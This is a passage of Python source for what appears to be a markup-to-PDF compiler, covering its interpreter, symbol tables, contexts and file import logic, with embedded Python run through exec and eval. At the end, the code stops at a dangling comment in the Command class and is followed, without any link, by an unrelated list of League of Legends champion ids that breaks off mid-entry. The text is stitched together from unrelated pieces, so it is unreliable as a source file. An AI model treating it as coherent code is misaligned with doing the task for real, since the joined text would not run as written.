""" res = ParseResult() if not (self._current_tok.type == token_type): return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Expected a Token of type {token_type}, but got token {self._current_tok}')) return res.success(self._advance(res)) # ----------------------------------------------------------------------------- # Interpreter and Related Classes class RunTimeResult: """ Wraps a return value in the Interpreter so that, when a visit method finishes visiting a Node, it can tell the Node that visited it various things such as whether to return immediately or not. """ __slots__ = ['value', 'error'] def __init__(self): self.reset() def reset(self): self.value = None self.error = None def register(self, res): """ Register the returned result from a Node you just visited. This way, if you should return because an error occured or something, you can. """ self.error = res.error return res.value def success(self, value): self.reset() self.value = value return self def failure(self, error): self.reset() self.error = error return self class SymbolTable: """ The symbol table is used to store the commands. """ def __init__(self, parent=None): self.symbols = {} self.parent = parent def get(self, name): """ Returns the value for the name if it is in the SymbolTable, None otherwise """ value = self.symbols.get(name, None) if value == None and self.parent: return self.parent.get(name) return value def set(self, name, value): """ Sets a the value for a name in the symbol table """ self.symbols[name] = value def remove(self, name): """ Removes a name from the symbol table. """ self.symbols.pop(name) def import_(self, other_symbol_table, commands_to_import=None): """ Imports the symbols of the other symbol table into this one. If commands_to_import is None, then import every command. Otherwise, only import the commands with the names listed. """ if commands_to_import is None: self.symbols.update(other_symbol_table.symbols) else: oth_syms = other_symbol_table.symbols for command_name in commands_to_import: if command_name in oth_syms: self.symbols[command_name] = oth_syms[command_name] else: raise AssertionError(f'Could not import {command_name}.') def copy(self): import copy new = SymbolTable(None if self.parent is None else self.parent.copy()) new.symbols = copy.deepcopy(self.symbols) return new def __repr__(self): string = f'\n{type(self).__name__}(' string += f'symbols={self.symbols}' string += ')' return string class Context: """ Provides Context for every command/amount of python code that is run. By that I mean that the Context determines what commands and variables are available and when. """ __slots__ = ['display_name', 'file_path', 'entry_pos', 'parent', '_globals', '_locals', 'symbols', '_token_document', 'global_level'] def __init__(self, display_name, file_path, parent=None, entry_pos=None, token_document=None, globals=None, locals=None, symbol_table=None): """ Context could be a function if in a function or the entire program (global) if not in a function. """ self.display_name = display_name # the command/program name self.file_path = file_path # the path to the file that the command is in self.entry_pos = entry_pos # the position in the code where the context changed (where the command was called) self.parent = parent # Parent context if there is one # These are the globals and locals used by Python. 
The SymbolTable is # used for Commands, not these self._globals = globals # dict or None self._locals = locals # dict or None # Make sure that there are globals self.globals() # will throw an error if there are no globals, even in parent contexts if symbol_table is not None: assert_instance(symbol_table, SymbolTable, or_none=False) self.symbols = symbol_table # SymbolTable elif parent is not None and parent.symbols is not None: self.symbols = SymbolTable(parent.symbols) else: self.symbols = SymbolTable() if token_document is not None: self._token_document = token_document else: self._token_document = [] self.global_level = True def __repr__(self): string = f'\n{type(self).__name__}(\n' string += f'\tdisplay_name={self.display_name}' string += f'\tsymbols={self.symbols}' string += f'\tglobals={self._globals}' string += f'\tlocals={self._locals}' string += f'\tparent={self.parent}' string += '\n)' return string def copy(self): _globals = None if self._globals is None else {key:val for key, val in self._globals.items()} _locals = None if self._locals is None else {key:val for key, val in self._locals.items()} entry_pos = None if self.entry_pos is None else self.entry_pos.copy() parent = None if self.parent is None else self.parent.copy() new = Context(self.display_name, self.file_path, parent, entry_pos, self._token_document[:], _globals, _locals) new.symbols = self.symbols.copy() return new def gen_child(self, child_display_name:str, child_entry_pos=None, locals_to_add=None): """ Generates a child context i.e. a subcontext such as that which is inside a command. locals_to_add are things like the \\test variable below, which should be made available to any Python Code that is inside the command \\# Global Context \\hello = (\\test) = { \\# This should have a subcontext where commands can be defined in \\# here but not mess with those defined in the global context/ \\# any parent context \\test \\# is defined in this child context } \\# \\test is undefined here, in this global context """ # Generate the new python locals. Because only one locals dict can be # passed to an exec or eval method at a time, it must have all the # references to parent locals in it so that it works as if it could # look up the locals hierarchy as the SymbolTables do for Commands # In other words, the child Context's locals must be a superset of this # Context's locals child_lcls = {} if (self._locals is None) else {key:val for key, val in self._locals.items()} if locals_to_add: child_lcls.update(locals_to_add) parent = self # Give the new context a reference to globals so that it does not have # to walk up a bunch of parents to get it anyway child = Context(child_display_name, self.file_path, parent, child_entry_pos, self.token_document(), self.globals(), child_lcls, SymbolTable(self.symbols)) child.global_level = False return child def import_(self, other_context, tokens_to_import=[], commands_to_import=None): """ Takes another context and imports its contents into this one. """ self.symbols.import_(other_context.symbols, commands_to_import) self.globals().update(other_context.globals()) self.token_document().extend(tokens_to_import) def globals(self): if self._globals is not None: return self._globals elif self.parent is not None: return self.parent.globals() else: raise Exception("You did not pass in globals to the Global Context.") def locals(self): return self._locals def token_document(self): """ The list of tokens that should be given to the Placer object to actually make the PDFDocument. 
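
        Nodes that produce writing append to this list as the tree is
        interpreted; for example, the document visitor does
        context.token_document().extend(write_tokens) when it is at the
        global level.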
""" return self._token_document def set_token_document(self, new_doc): self._token_document = new_doc class InterpreterFlags: """ Flags for the Interpreter so that it can know what to do when it does a pass over an Abstract Syntax Tree created by the Parser. The difference between these flags and the context in the Interpreter is that things in the flags stay the same for the entire AST pass whereas the things in the context could change at each visit to a node. """ def __init__(self): pass class Interpreter: """ The interpreter visits each node in the Abstract Syntax Tree generated by the Parser and actually runs the corresponding code for the node. """ def __init__(self): self._context_stack = [] self._curr_context = None self._command_node_stack = [] self._curr_command_node = None def _push_context(self, context): self._context_stack.append(context) self._curr_context = context def _pop_context(self): self._context_stack.pop() self._curr_context = self._context_stack[-1] if len(self._context_stack) > 0 else None def curr_context(self): return self._curr_context def _push_command_node(self, command_node): self._command_node_stack.append(command_node) self._curr_command_node = command_node def _pop_command_node(self): self._command_node_stack.pop() self._curr_command_node = self._command_node_stack[-1] if len(self._command_node_stack) > 0 else None def curr_command_node(self): return self._curr_command_node def visit_root(self, node, context, flags, print_progress=False): """ The visit to the root node of an AST. """ if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Running AST for ', f'{context.display_name}', align='>', suffix='', append='...')) prev_context = self._curr_context self._curr_context = context result = self.visit(node, context, flags) self._curr_context = prev_context if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Done Running AST for ', context.display_name, align='>', suffix='', append='')) return result def visit(self, node, context, flags): method_name = f'_visit_{type(node).__name__}' method = getattr(self, method_name, self._no_visit_method) return method(node, context, flags) def _no_visit_method(self, node, context, flags): raise Exception(f'No _visit_{type(node).__name__} method defined in Interpreter') # ------------------------------ # Rule Implementations def _visit_FileNode(self, node, context, flags): res = RunTimeResult() result = res.register(self.visit(node.document, context, flags)) if res.error: return res return res.success(result) def _visit_DocumentNode(self, node, context, flags): res = RunTimeResult() document = [] was_global = context.global_level if was_global: context.global_level = False for paragraph in node.paragraphs: write_tokens = res.register(self.visit(paragraph, context, flags)) if res.error: return res else: if was_global: context.token_document().extend(write_tokens) document.extend(write_tokens) if was_global: context.global_level = True return res.success(document) def _visit_ParagraphNode(self, node, context, flags): res = RunTimeResult() # How long the document has gotten so far i = len(context.token_document()) # Visit the writing (could be Plaintext, Python, command def, or a Command call) write_tokens = res.register(self.visit(node.writing, context, flags)) if res.error: return res if len(write_tokens) > 0: # Command was called and this Class was used to make the length # of the write_tokens > 0 because a command was called if write_tokens[0] == Interpreter.CommandCalled: write_tokens.pop(0) if node.paragraph_break: # Add 
the paragraph break to before the current text was added context.token_document().insert(i, node.paragraph_break) return res.success(write_tokens) def _visit_WritingNode(self, node, context, flags): """ Visits a WritingNode. If successful, this method will return a string of what the ParagraphNode is supposed to write. """ res = RunTimeResult() write_tokens = res.register(self.visit(node.writing, context, flags)) # Error Handling if res.error: return res return res.success(write_tokens) def _visit_PythonNode(self, node, context, flags): res = RunTimeResult() python_token = node.python tt = python_token.type # Execute or eval python if tt == TT.EXEC_PYTH1: python_result = exec_python(python_token.value, context.globals(), context.locals()) elif tt == TT.EVAL_PYTH1: python_result = eval_python(python_token.value, context.globals(), context.locals()) # For second pass python, it needs to be kept until we are actually # placing the text on the PDF, then the Placer will be made available # to the python and the code can make changes to the PDF elif tt in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): python_result = [python_token.gen_pass_2_python( \ None if context.locals() is None else \ {key:val for key, val in context.locals().items()})] else: raise Exception(f"The following token was found in a PythonNode, it is not supposed to be in a PythonNode: {tt}") if isinstance(python_result, type(None)): python_result = [] elif isinstance(python_result, str): python_result = Tokenizer.plaintext_tokens_for_str(python_result) elif isinstance(python_result, MarkedUpText): python_result = Tokenizer.tokens_for_marked_up_text(python_result) elif isinstance(python_result, Exception) or issubclass(type(python_result), Exception): return res.failure(PythonException(node.start_pos.copy(), node.end_pos.copy(), 'An error occured while running your Python code.', python_result, context)) return res.success(python_result) def _visit_CommandDefNode(self, node, context, flags): res = RunTimeResult() cmnd_name = node.cmnd_name.value cmnd_params = node.cmnd_params cmnd_key_params = node.cmnd_key_params text_group = node.text_group context.symbols.set(cmnd_name, Command( cmnd_params, cmnd_key_params, text_group )) return res.success([]) def _visit_CommandCallNode(self, node, context, flags): res = RunTimeResult() tokens = [] cmnd_name_str = node.cmnd_name.value command_to_call = context.symbols.get(cmnd_name_str) self._push_command_node(node) if command_to_call is None: # The command is undefined return res.failure(RunTimeError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), '"\\' + f'{cmnd_name_str}" is undefined.', context )) elif isinstance(command_to_call, TextGroupNode): # Handle when the "command" is actually a parameter that contains # text. 
For example, in # # \hello = (\test) { # \test # } # # \test is a actually storing a TextGroupNode when the command # \hello is called, so this method handles returning the TextGroupNode # that that \test contains when \test is called result = res.register(self.visit(command_to_call, context, flags)) if res.error: return res if result: tokens.extend(result) else: # Command is defined and we need to call it min_args = len(command_to_call.params) max_args = min_args + len(command_to_call.key_params) num_positional_args = len(node.cmnd_tex_args) num_key_args = len(node.cmnd_key_args) num_args_given = num_positional_args + num_key_args # Check if enough positional arguments were given if num_positional_args < min_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command requires {min_args} argument(s), but {num_positional_args} was/were given.', )) # Check if too many arguments were given if num_args_given > max_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command takes {max_args} argument(s) max, but {num_args_given} was/were given.', )) cmnd_args = {} # Add all the command names first cmnd_and_key_param_names = [] for param in command_to_call.params: name = param.identifier.value if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) # Take each Parameter key-value pair (so the key-value pairs # in the definition of the command) and add them to the dict for cmnd_key_param in command_to_call.key_params: name = cmnd_key_param.key.value # Now add the key-params because the positional arguments will # fullfill parameters and key-parameters in the order that # they are in cmnd_and_key_param_names if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) cmnd_args[name] = cmnd_key_param.text_group # Now replace those key-value pairs from the definiton of the command # with those given in the call of command for key_arg in node.cmnd_key_args: # key params CommandKeyParamNode key = key_arg.key.value if not (key in cmnd_args): return res.failure(InvalidSyntaxError(key_arg.key.start_pos.copy(), key_arg.key.end_pos.copy(), f'"{key}" is not defined in command "{cmnd_name_str}". 
In other words, this key is not defined as a key-argument in the command\'s definition.', )) cmnd_args[key] = key_arg.text_group # now take each name from the POSITIONAL-ARGUMENT names provided in # the command's definition and provide the values for them from # the command call for param_name, arg in zip(cmnd_and_key_param_names, node.cmnd_tex_args): # params are CommandParamNode cmnd_args[param_name] = arg.text_group # Init py_locals, the python local variables to add to the current # context py_locals = {} for key, arg in cmnd_args.items(): # Visit the argument node and get the tokens from it new_tokens = res.register(self.visit(arg, context, flags)) if res.error: return res # Convert the tokens to MarkedUpText, something that can be used # in Python marked_up_text = Tokenizer.marked_up_text_for_tokens(new_tokens) if marked_up_text == '<NONE>': marked_up_text = None # Assign each python local to its marked_up_text py_locals[key] = marked_up_text child_context = context.gen_child(cmnd_name_str, node.start_pos.copy(), py_locals) # Just check to make sure that a value has been passed for each needed argument for key, value in cmnd_args.items(): if value == 0: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'"{key}", an argument in {cmnd_name_str}, has no value. You need to pass in an argument for it in this call of the command.', )) else: child_context.symbols.set(key, value) self._push_context(child_context) # actually run the command now that its variables have been added to the context result = res.register(self.visit(command_to_call.text_group, child_context, flags)) if res.error: return res tokens = result self._pop_context() self._pop_command_node() if len(tokens) > 0: # Find the first Token and set space_before to True if the # command call had space_before = True, otherwise set it False for token in tokens: if isinstance(token, Token): token.space_before = node.cmnd_name.space_before break # Tells the Paragraph Node that a Command was called so that it can # decide whether to insert a paragraph break depending on whether # there was one before the Command was called or not tokens.insert(0, Interpreter.CommandCalled) return res.success(tokens) def _visit_TextGroupNode(self, node, context, flags): res = RunTimeResult() doc_tokens = res.register(self.visit(node.document, context, flags)) if res.error: return res for token in doc_tokens: if isinstance(token, Token): token.space_before = node.ocbrace.space_before break return res.success(doc_tokens) def _visit_PlainTextNode(self, node, context, flags): res = RunTimeResult() return res.success(node.plain_text) # ----------------------------- # Helper Classes class CommandCalled: """ A helper class that just tells the Paragraph Node that a Command was called so that it can make an imformed decision on whether to add a paragraph break """ pass # ----------------------------------------------------------------------------- # Compiler Class class CompilerProxy: """ The actual object that is given to files being compiled named 'compiler'. The reason this object is given and not the actual compiler because this makes it clear what methods are actually meant to be used in the files being compiled. """ def __init__(self, compiler): self._compiler = compiler # --------------------------------- # Methods for Directory/File Finding def main_file_path(self): """ The path to the main/input file that the compiler started with. 
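
        Inside a file being compiled, this proxy is exposed to embedded
        Python under the global name compiler, so (for example) calling
        compiler.main_file_path() from such code returns this same path.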
""" return self._compiler.main_file_path() def main_file_dir(self): """ The directory that the main/input file is in. """ return self._compiler.main_file_dir() def curr_file_path(self): """ The path to the file that is currently being compiled i.e. the file that you are in when you call this method. """ return self._compiler.curr_file_path() def curr_file_dir(self): """ The directory that the current file being run is in. """ return self._compiler.curr_file_dir() # --------------------------------- # Methods for importing/inserting files def strict_import_file(self, file_path): self._compiler.strict_import_file(file_path) def std_import_file(self, file_path): self._compiler.std_import_file(file_path) def import_file(self, file_path): self._compiler.import_file(file_path) def far_import_file(self, file_path): self._compiler.far_import_file(file_path) def insert_file(self, file_path): self._compiler.insert_file(file_path) def strict_insert_file(self, file_path): self._compiler.strict_insert_file(file_path) def far_insert_file(self, file_path): self._compiler.far_insert_file(file_path) # --------------------------------- # Other Methods def placer_class(self): return self._compiler.placer_class() def set_placer_class(self, placer_class): return self._compiler.set_placer_class(placer_class) class Compiler: """ This object orchestrates the compilation of plaintext files into PDFs """ def __init__(self, input_file_path, path_to_std_dir, print_progess_bars=False, encoding='utf-8'): self._commands = {} self._files_by_path = {} assert path.isfile(input_file_path), f'The given path is not to a file or does not exist: {input_file_path}' self._input_file_path = input_file_path self._input_file_dir = path.dirname(input_file_path) self._std_dir_path = path_to_std_dir self._print_progress_bars = print_progess_bars self._encoding = encoding # The encoding that the pdfo files are in self._toolbox = ToolBox(self) self._compiler_poxy = CompilerProxy(self) self._placer_class = NaivePlacer self._interpreter_stack = [] # The globals that will be copied every time a fresh set of globals # is needed self._globals = {'__name__': __name__, '__doc__': None, '__package__': None, '__loader__': __loader__, '__spec__': None, '__annotations__': None, '__builtins__': _copy.deepcopy(globals()['__builtins__']), 'compiler':self._compiler_poxy, 'toolbox':self._toolbox} # remove any problematic builtins from the globals rem_builtins = [] for key in rem_builtins: self._globals['__builtins__'].pop(key) # ------------------------------------------------------------------------- # Main Methods def compile_pdf(self): """ Compiles the PDF and returns the PDFDocument that can be used to draw the PDF multiple times to different files. """ fresh_context = self._fresh_context(self._input_file_path) # Now run the main\input file self._insert_file(self._input_file_path, fresh_context, print_progress=self._print_progress_bars) from placer.token_stream import TokenStream return TokenStream(fresh_context.token_document(), self._placer_class, fresh_context.globals(), self._input_file_path, self._print_progress_bars).place_tokens() def compile_and_draw_pdf(self, output_pdf_path): """ Convenience function that compiles and draws the PDF """ self.compile_pdf().draw(output_pdf_path, print_progress=self._print_progress_bars) # ------------------------------------------------------------------------- # Helper Methods def _fresh_globals(self): """ Returns a fresh set of globals as they are before the program starts compiling. 
These globals are for the python exec and eval methods that are used to run python code. """ return {key:val for key, val in self._globals.items()} def _fresh_context(self, file_path): """ Returns a fresh context for running a file as if it were the main/input file (even if it isn't actually the main/input file). """ parent = None; entry_pos = None; token_document = []; locals = None context = Context(file_path, file_path, parent, entry_pos, token_document, self._fresh_globals(), locals, SymbolTable()) # insert the standard file into the context self._insert_file(self._path_to_std_file(STD_LIB_FILE_NAME), context, print_progress=self._print_progress_bars) return context def _push_interpreter(self): """ Pushes a new Interpreter onto the interpreter stack. """ self._interpreter_stack.append(Interpreter()) def _pop_interpreter(self): """ Pops the _curr_interpreter off the interpreter stack. """ return self._interpreter_stack.pop() def _curr_interpreter(self): """ Returns the current Interpreter. """ _is = self._interpreter_stack return None if len(_is) <= 0 else _is[-1] def _curr_context(self): """ Returns the current Context. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_context def _curr_tok_document(self): """ Returns the current document made of tokens, not to be confused with the PDFDocument object that is returned by the Placer. The "document" returned by this method is a list of Tokens that can be given to a Placer to produce a PDFDocument. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_document def _compiler_import_file(self, file_path, print_progress=False): """ Imports a file. If the file has not already been imported by the compiler, this method will read in the file, tokenize, and parse it into an Abstract Syntax Tree (AST), before caching the raw_text, tokens, and ast in a File object and returning the File object. If the file has already been imported, this method will return the cached File object. To run the file object, the root of the AST must be visited by the Interpreter. This can be acheived by doing Interpreter().visit_root(file.ast) """ assert path.isfile(file_path), f'Could not import "{file_path}"' file_path = path.abspath(file_path) # If file already imported, just return the file if file_path in self._files_by_path: return self._files_by_path[file_path] file = File(file_path) self._files_by_path[file_path] = file try: with open(file_path, encoding=self._encoding) as f: file.raw_text = f.read() # Raw text that the file contains except: raise AssertionError(f'Could not decode the given file as {self._encoding}.') file.tokens = Tokenizer(file.file_path, file.raw_text, print_progress_bar=print_progress).tokenize() # Returns a ParseResult, so need to see if any errors. If no Errors, then set file.ast to the actual abstract syntax tree file.ast = Parser(file.tokens, print_progress_bar=print_progress).parse() if file.ast.error is not None: raise file.ast.error else: file.ast = file.ast.node return file def _run_file(self, file, context, print_progress=False): """ Runs a file, importing it first if need be, and returns the tokens and context that that the file generates. By "import", I mean that it loads the file into memory, tokenizes it and makes it into an AST, not that it does the same thing as the \\import command context is the current Context that you want the file to be run in. 
""" if isinstance(file, str): # It should be a file path file_obj = self._compiler_import_file(file, print_progress) else: # It should be a File object file_obj = file if file_obj.being_run: raise AssertionError(f"The given file is already being run (imported or inserted), so you probably have a circular import which is not allowed: {file_obj.file_path}") else: file_obj.being_run = True self._push_interpreter() # Save the context's current display_name and file_path old_disp_name = context.display_name old_path = context.file_path # Give the context the display name and file path of the file it is now # going into context.display_name = file_obj.file_path context.file_path = file_obj.file_path # Since just pushed interpreter, self._curr_interpreter() should not be None result = self._curr_interpreter().visit_root(file_obj.ast, context, InterpreterFlags(), print_progress) # Restore the context's display name and file_path to what they were before context.display_name = old_disp_name context.file_path = old_path self._pop_interpreter() if result.error: raise result.error file_obj.being_run = False return result.value # Return the tokens gotten by running the file def _insert_file(self, file_path, context, print_progress=False): """ Inserts the file into the current file. This means that the file must be run with the current context as if it were directly in the file. context is the context that this file is being inserted into """ # Since the context is directly given to self._run_file, all of the # commands and whatnot in the global portion of the file will be # added to the given context as if it was in the context directly # and not in another file was_global = context.global_level context.global_level = True i = len(context.token_document()) self._run_file(file_path, context, print_progress) # Want to add a space before the first Token we come accross. # Note: the compiler may still not render a space before the token # if the token is at the start of a line. That is why this is safe # to do. We are meely saying "this Token should have a space before # it if it makes sense to have one before it" doc = context.token_document() ci = self._curr_interpreter() if ci and ci.curr_command_node(): ccc = ci.curr_command_node() length = len(doc) while True: if i >= length: # reached end of Token document without finding a single # Token break curr = doc[i] if isinstance(curr, Token): # Found a Token so set whether it has a space before it based # on the current command that is being run and whether # the command has a space before it (i.e. if there is # space before \insert{file_path}, then the first token # of the inserted text from the file should have a space # before it, otherwise it should not have a space before # it) curr.space_before = ccc.cmnd_name.space_before break i += 1 context.global_level = was_global def _import_file(self, file_path, context, commands_to_import=None, print_progress=False): """ Imports a file. This is very different from self._insert_file because it takes the file, gives it a fresh context, and runs the file. The resulting context can be saved to the File object for the file because the resulting global context from running the file does not depend on any other file's context. 
In this way, once a file is imported once, its resulting tokens and Context can be reused over and over again, whereas the tokens and Context from self._insert_file cannot be and the file must be re-run every time it is inserted into a file, regardless of whether it has been inserted into a file before. context is the context that you want to import the file into. If commands_to_import are given, then only the commands by the names specified in the list of strings will be imported. All Python globals will still, however, be imported. """ file_obj = self._compiler_import_file(file_path, print_progress) if file_obj.import_context is None: # Since this file has not yet been run, we will have to run it # now with a fresh context unrelated to any other context # Using file_obj.file path in case it is different from the argument file_path context_to_import = self._fresh_context(file_obj.file_path) tokens = self._run_file(file_obj, context_to_import, print_progress) # Since the file was imported, that means it does not depend on the # current context and thus the context can be saved and reused later file_obj.import_context = context_to_import # I expect most imports to have some global Python code that they # want to be run on the second pass, so that code must be imported # too or else it will never reach the Placer and be run. tokens_to_import = [] for token in tokens: if isinstance(token, Token) and token.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): tokens_to_import.append(token) file_obj.import_tokens = tokens_to_import else: # Since this file has been imported before, just reuse the same # context as last time because the context is not dependant # on the current context of when/where the file is being run context_to_import = file_obj.import_context tokens_to_import = file_obj.import_tokens try: context.import_(context_to_import, tokens_to_import, commands_to_import) except AssertionError as e: raise AssertionError(f'{file_path} could not be imported because of the following error:{e}') def _path_to_std_file(self, file_path): """ Returns the file path as a file path to a standard directory file. """ # Replace the ending of the file path with the one used by all standard files split_file_path = file_path.split('.') if len(split_file_path) > 1 and split_file_path[-1] == STD_FILE_ENDING: split_file_path.pop() split_file_path.append(STD_FILE_ENDING) file_path = '.'.join(split_file_path) # check if the file exists file_path = path.abspath(path.join(self._std_dir_path, file_path)) return file_path def _path_rel_to_file(self, file_path, curr_file=True): """ Returns the file path if the given path is relative to the main file being run or the current file being run. """ dir = self.curr_file_dir() if curr_file else self.main_file_dir() file_path = path.abspath(path.join(dir, file_path)) return file_path def _get_near_path(self, file_path): """ Gets the near path to insert/import. This checks the path relative to to the current file first, then checks the file relative to the main/input file, and then it checks the standard directory. 
""" ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) assert path.isfile(std_path), f'Could not get near path for "{file_path}" because neither "{cf_rel_path}", nor "{input_rel_path}", nor "{std_path}" lead to a file and/or exist.' return ret_path def _get_far_path(self, file_path): """ Gets the far path to insert/import. This checks the standard directory first and then checks the path relative to the main/input file and then checks the path relative to the current file. """ _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) assert path.isfile(std_path), f'Could not get far path for "{file_path}" because neither "{std_path}", nor "{input_rel_path}", nor "{cf_rel_path}" lead to a file and/or exist.' return ret_path # ------------------------------------ # Methods available from CompilerProxy # Methods for Inserting and Importing Files def insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def strict_insert_file(self, file_path): """ Runs the file at the given file path and inserts it into the current document. The file path is assumed to be relative to the current file. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' # Actually insert the file self._insert_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def far_insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot far insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) def strict_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. This file path is assumed to be relative to the main file being run. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. 
""" file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def std_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_to_std_file(file_path), cc, print_progress=self._print_progress_bars) def far_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) # Methods for retrieving files and directories for the current file. def main_file_path(self): """ Returns the file path to the main/first/input file that is/was run. """ return self._input_file_path def main_file_dir(self): """ Returns an absolute path to the directory that the main file that is being run is in. """ return path.dirname(self.main_file_path()) def curr_file_path(self): """ Returns an absolute path to the current file that is being run. """ cc = self._curr_context() assert cc is not None, f'The current context was None so the current file path could not be retrieved.' return cc.file_path def curr_file_dir(self): """ Returns an absolute path to the directory that the current file that is being run is in. """ return path.dirname(self.curr_file_path()) # Misc Methods def placer_class(self): return self._placer_class def set_placer_class(self, placer_class): """ Sets the placer class that will be used to place the tokens on the PDF. This allows a person to, theoretically, create their own placer in a pdfo file and make the compiler use that instead. """ self._placer_class = placer_class class Command: """ Represents a command in the file. """ __slots__ = ['params', 'key_params', 'text_group'] def __init__(self, params, key_params, text_group): self.params = params self.key_params = key_params self.text_group = text_group # This will be run for the command
champions = [{'id': u'62', 'key': u'MonkeyKing'}, {'id': u'24', 'key': u'Jax'}, {'id': u'35', 'key': u'Shaco'}, {'id': u'19', 'key': u'Warwick'}, {'id': u'76', 'key': u'Nidalee'}, {'id': u'143', 'key': u'Zyra'}, {'id': u'63', 'key': u'Brand'}, {'id': u'33', 'key': u'Rammus'}, {'id': u'420', 'key': u'Illaoi'}, {'id': u'42', 'key': u'Corki'}, {'id': u'201', 'key': u'Braum'}, {'id': u'34', 'key': u'Anivia'}, {'id': u'23', 'key': u'Tryndamere'}, {'id': u'21', 'key': u'MissFortune'}, {'id': u'83', 'key': u'Yorick'}, {'id': u'101', 'key': u'Xerath'}, {'id': u'15', 'key': u'Sivir'}, {'id': u'92', 'key': u'Riven'}, {'id': u'61', 'key': u'Orianna'}, {'id': u'41', 'key': u'Gangplank'}, {'id': u'54', 'key': u'Malphite'}, {'id': u'78', 'key': u'Poppy'}, {'id': u'30', 'key': u'Karthus'}, {'id': u'126', 'key': u'Jayce'}, {'id': u'53', 'key': u'Blitzcrank'}, {'id': u'48', 'key': u'Trundle'}, {'id': u'113', 'key': u'Sejuani'}, {'id': u'104', 'key': u'Graves'}, {'id': u'236', 'key': u'Lucian'}, {'id': u'150', 'key': u'Gnar'}, {'id': u'99', 'key': u'Lux'}, {'id': u'102', 'key': u'Shyvana'}, {'id': u'58', 'key': u'Renekton'}, {'id': u'114', 'key': u'Fiora'}, {'id': u'222', 'key': u'Jinx'}, {'id': u'429', 'key': u'Kalista'}, {'id': u'105', 'key': u'Fizz'}, {'id': u'38', 'key': u'Kassadin'}, {'id': u'37', 'key': u'Sona'}, {'id': u'8', 'key': u'Vladimir'}, {'id': u'112', 'key': u'Viktor'}, {'id': u'203', 'key': u'Kindred'}, {'id': u'69', 'key': u'Cassiopeia'}, {'id': u'57', 'key': u'Maokai'}, {'id': u'412', 'key': u'Thresh'}, {'id': u'10', 'key': u'Kayle'}, {'id': u'120', 'key': u'Hecarim'}, {'id': u'121', 'key': u'Khazix'}, {'id': u'2', 'key': u'Olaf'}, {'id': u'115', 'key': u'Ziggs'}, {'id': u'134', 'key': u'Syndra'}, {'id': u'36', 'key': u'DrMundo'}, {'id': u'43', 'key': u'Karma'}, {'id': u'1', 'key': u'Annie'}, {'id': u'84', 'key': u'Akali'}, {'id': u'89', 'key': u'Leona'}, {'id': u'157', 'key': u'Yasuo'}, {'id': u'85', 'key': u'Kennen'}, {'id': u'107', 'key': u'Rengar'}, {'id': u'13', 'key': u'Ryze'}, {'id': u'98', 'key': u'Shen'}, {'id': u'154', 'key': u'Zac'}, {'id': u'80', 'key': u'Pantheon'}, {'id': u'50', 'key': u'Swain'}, {'id': u'432', 'key': u'Bard'}, {'id': u'14', 'key': u'Sion'}, {'id': u'67', 'key': u'Vayne'}, {'id': u'75', 'key': u'Nasus'}, {'id': u'4', 'key': u'TwistedFate'}, {'id': u'31', 'key': u'Chogath'}, {'id': u'77', 'key': 